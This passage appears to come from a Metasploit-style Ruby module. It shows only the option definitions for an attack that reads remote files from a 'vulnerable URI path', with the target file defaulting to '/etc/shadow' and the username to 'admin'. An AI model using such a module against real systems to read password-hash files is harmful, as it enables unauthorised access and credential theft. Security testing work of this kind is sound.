register_options(
      [
        OptString.new('FILE', [ true,  'Remote file to view', '/etc/shadow']),
        OptString.new('TARGETURI', [true, 'Vulnerable URI path', '/']),
        OptString.new('USERNAME', [true, 'Username', 'admin']),